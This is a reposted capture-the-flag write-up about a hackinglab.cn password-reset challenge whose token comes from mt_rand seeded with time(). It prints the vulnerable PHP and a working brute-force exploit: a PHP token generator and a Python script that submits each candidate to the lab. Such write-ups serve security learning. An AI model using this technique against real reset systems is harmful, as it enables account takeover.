Xiao Ming learning code audit writeup

Others 2019-07-19 00:07:57 views: null

Xiao Ming learning code audit writeup

Off topic from hackinglab.cn comprehensive
topics Address: http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php

Access address topics get the following source:

Please Reset Your Password Then Get your flag!
<a href="./resetpwd.php"></a>

According to replicate access links resetpwd.php, and view the page source code, found the notes have PHP Code:

<?php 
session_start();
include '_flag.php';
date_default_timezone_set('Asia/Shanghai');
if(isset($_POST['token']) && isset($_SESSION['token']) &&!empty($_POST['token'])&&!empty($_SESSION['token'])){
    if($_POST['token']==$_SESSION['token']){
        echo "PassResetSuccess! Your Flag is:".$flag;
    }else{
        echo "Token_error!";
    }
}else{
    mt_srand(time());
    $rand= mt_rand();
    $_SESSION['token']=sha1(md5($rand));
    echo "Token Generate Ok! now send email to your EmailBox!.....";
    if(sendmymail($_SESSION['token'])){
        echo "SendOK! \r\n<br> Your password reset Token has been send to your mailbox! <br>Please Check your mail box and fill your token here to reset your password!<br>";
    };
}
echo '<form action="" method="POST">
    <input type="text" name="token">
    <input type="submit" value="submit">
</form>';
echo "<!--\r\n".file_get_contents(__FILE__);
?>

Source analysis shows that only the correct token to get the flag. If you do not submit token, direct request resetpwd.php page, token will be reset. If you submit a token, token will not change.

Code generation token embodiment described, using a random manner

mt_srand(time());
$rand= mt_rand();
$_SESSION['token']=sha1(md5($rand));

According to the rules of random number generation, the same long mt_srand () parameter, the generated random number is actually fixed. So we can write exp:

Auxiliary scripts

$base = time();  
//设定一个时间区间,来确保可以碰撞到正确的时间
for($i = -5;$i <= 5;$i++)
{
    mt_srand($base+$i);
    $rand = mt_rand();
    echo sha1(md5($rand))."<br/>";
}

EXP

import requests
r = requests.get('http://localhost/ttt.php')
rlt = r.text.split('<br/>')
rlt = rlt[:-1]
data = {}
header  = {"Cookie":"PHPSESSID=294a9b966570ae34347a613e894d3271","Referer":"http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php"}
url = 'http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/resetpwd.php'
#重置token
r = requests.get(url,headers=header)

for i in rlt:
    data["token"] = i
    r = requests.post(url,data=data,headers=header)
    r.encoding = r.apparent_encoding
    if "Token_error!" not in r.text[:60]:
        print(r.text[:60])

Get flag

PassResetSuccess! Your Flag is:NotSecurityRandomNowYouKnown<

Guess you like

Origin www.cnblogs.com/kevinbruce656/p/11209125.html
Recommended
Ranking
2019 JD pen questions - Choir
Grafana installation & basic configuration
How to solve the high gas fee of Filecoin? The official attitude is bright!
Informatization development 59
Date,DateFormat,Calendar,
Introduction to MySQL - Understanding MySQL
win10 conexão de área de trabalho remota ubuntu20 (RDP)
52. Customize generics on methods
Detailed explanation of CAP, ACID, BASE theory and NWR practice strategy
UnknownHostException:XXX:Name or service not know
Daily
More
2024-08-01(0)
2024-07-31(0)
2024-07-30(0)
2024-07-29(0)
2024-07-28(0)
2024-07-27(0)
2024-07-26(0)
2024-07-25(0)
2024-07-24(0)
2024-07-23(0)

Code World

© 2018 codetd.com